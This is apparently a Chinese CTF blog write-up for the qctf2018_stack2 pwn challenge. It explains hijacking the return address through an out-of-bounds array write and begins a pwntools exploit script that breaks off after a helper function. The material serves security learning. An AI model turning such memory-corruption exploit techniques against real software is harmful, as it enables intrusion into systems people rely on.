week2

1 · · Aug. 2, 2021, 2:02 a.m.
1.qctf2018_stack2这个题挺坑的,他给的system(“/bin/bash”)用不了,并且ida的偏移与gdb上的不一样,思路是通过数组下标越界劫持ret(我本地用ubuntu16,偏移一直不对,结果一用18就行了)123456789101112131415161718192021222324252627282930313233343536373839from pwn import *#p = remote("node4.buuoj.cn",28526)p = process("./stack2")elf = ELF("./stack2")context.log_level="debug"#libc = ELF('./libc-2.23.so')def edit(idx,num):p.recvuntil("5. exit\n")p.sendline("3")p.recvuntil("which number to change:\n")p.sendline(str(idx))p.recvuntil("new number:\n")p.sendline(str(num))p...